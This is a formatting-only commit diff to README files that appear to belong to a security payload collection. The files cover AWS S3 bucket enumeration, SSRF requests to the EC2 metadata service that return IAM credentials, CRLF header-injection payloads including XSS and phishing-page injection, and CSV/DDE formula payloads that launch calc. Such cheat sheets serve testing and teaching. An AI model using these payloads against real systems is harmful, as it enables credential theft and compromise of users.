Markdown formatting update

AWS Amazon Bucket S3/README.md

@@ -1,47 +1,56 @@
 # Amazon Bucket S3 AWS
+
 Prerequisites, at least you need awscli
-```
+
+```bash
 sudo apt install awscli
 ```
+
 You can get your credential here https://console.aws.amazon.com/iam/home?#/security_credential
 but you need an aws account, free tier account : https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/
-```
+
+```javascript
 aws configure
 AWSAccessKeyId=[ENTER HERE YOUR KEY]
 AWSSecretKey=[ENTER HERE YOUR KEY]
 ```
-```
+
+```javascript
 aws configure --profile nameofprofile
 ```
 
 then you can use *--profile nameofprofile* in the aws command
 
 By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names
-```
+
+```bash
 http://s3.amazonaws.com/[bucket_name]/
 http://[bucket_name].s3.amazonaws.com/
 http://flaws.cloud.s3.amazonaws.com/
 ```
 
 ## Basic test - Listing the files
+
 ```bash
 aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
 aws s3 ls  s3://flaws.cloud/ --no-sign-request --region us-west-2
 ```
+
 You can get the region with a dig and nslookup
+
 ```bash
 $ dig flaws.cloud
 ;; ANSWER SECTION:
-flaws.cloud.		5	IN	A	52.218.192.11
+flaws.cloud.    5    IN    A    52.218.192.11
 
 $ nslookup 52.218.192.11
 Non-authoritative answer:
-11.192.218.52.in-addr.arpa	name = s3-website-us-west-2.amazonaws.com.
+11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
 ```
 
-
 ## Move a file into the bucket
-```
+
+```bash
 aws s3 mv test.txt s3://hackerone.marketing
 FAIL : "move failed: ./test.txt to s3://hackerone.marketing/test.txt A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."
 
@@ -50,17 +59,20 @@ SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
 ```
 
 ## Download every things (in an open bucket)
-```
+
+```powershell
 aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
 ```
 
 ## Check bucket disk size (authenticated) use, --no-sign for un-authenticated 
-```
+
+```powershell
 aws s3 ls s3://<bucketname> --recursive  | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'
 ```
 
 ## AWS - Extract Backup
-```
+
+```powershell
 aws --profile flaws sts get-caller-identity
 "Account": "XXXX26262029",
 
@@ -79,19 +91,23 @@ sudo file -s /dev/xvda1
 sudo mount /dev/xvda1 /mnt
 ```
 
-
 ## Bucket informations
+
 Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting :
-```
+
+```powershell
 http://169.254.169.254/latest/meta-data/
 http://169.254.169.254/latest/user-data/
 http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE will return the AccessKeyID, SecretAccessKey, and Token
 ```
+
 For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
 
 ## Bucket Finder
+
 A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files.
-```
+
+```powershell
 wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
 ./bucket_finder.rb my_words
 ./bucket_finder.rb --region ie my_words
@@ -104,14 +120,16 @@ wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar
 ./bucket_finder.rb --download --region ie my_words
 ./bucket_finder.rb --log-file bucket.out my_words
 ```
+
 Use a custom wordlist for the bucket finder, can be created with
-```
+
+```powershell
 List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart, walmart.com, walmart-backup, walmart-media.
 List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart.
 ```
 
-
 ## Thanks to
+
 * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
 * https://digi.ninja/projects/bucket_finder.php
 * [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)

CRLF injection/README.md

@@ -1,16 +1,20 @@
 # CRLF
+
 The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
 
 A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
 
 ## CRLF - Add a cookie
+
 Requested page
-```
+
+```powershell
 http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
 ```
 
 HTTP Response
-```
+
+```powershell
 Connection: keep-alive
 Content-Length: 178
 Content-Type: text/html
@@ -24,12 +28,16 @@ x-xss-protection: 1; mode=block
 ```
 
 ## CRLF - Add a cookie - XSS Bypass
+
 Requested page
-```
+
+```powershell
 http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
 ```
+
 HTTP Response
-```
+
+```powershell
 HTTP/1.1 200 OK
 Date: Tue, 20 Dec 2016 14:34:03 GMT
 Content-Type: text/html; charset=utf-8
@@ -50,15 +58,17 @@ X-XSS-Protection:0
 0
 ```
 
-
 ## CRLF - Write HTML
+
 Requested page
-```
+
+```powershell
 http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
 ```
 
 HTTP response
-```
+
+```powershell
 Set-Cookie:en
 Content-Length: 0
 
@@ -71,19 +81,21 @@ Content-Length: 34
 ```
 
 ## CRLF - Filter Bypass
+
 Using UTF-8 encoding
-```
+
+```powershell
 %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
 ```
+
 Remainder:
+
 * %E5%98%8A = %0A = \u560a
 * %E5%98%8D = %0D = \u560d
 * %E5%98%BE = %3E = \u563e (>)
 * %E5%98%BC = %3C = \u563c (<)
 
-
-
-
 ## Thanks to
+
 * https://www.owasp.org/index.php/CRLF_Injection
 * https://vulners.com/hackerone/H1:192749

CSV injection/README.md

@@ -1,29 +1,32 @@
 # CSV Excel formula injection
+
 Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.	
 
 ## Exploit
 
 Basic exploit with Dynamic Data Exchange 
-```
+
+```powershell
 DDE ("cmd";"/C calc";"!A0")A0
 @SUM(1+1)*cmd|' /C calc'!A0
+```
 
 Technical Details of the above payload:
 cmd is the name the server can respond to whenever a client is trying to access the server
 /C calc is the file name which in our case is the calc(i.e the calc.exe)
 !A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data
 
-```
-
 Any formula can be started with
-```
+
+```powershell
 =
 +
 –
 @
 ```
 
 ## Thanks to
-* https://owasp.org/index.php/CSV_Excel_Macro_Injection
-* https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection
-*https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
+
+* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
+* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
+* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)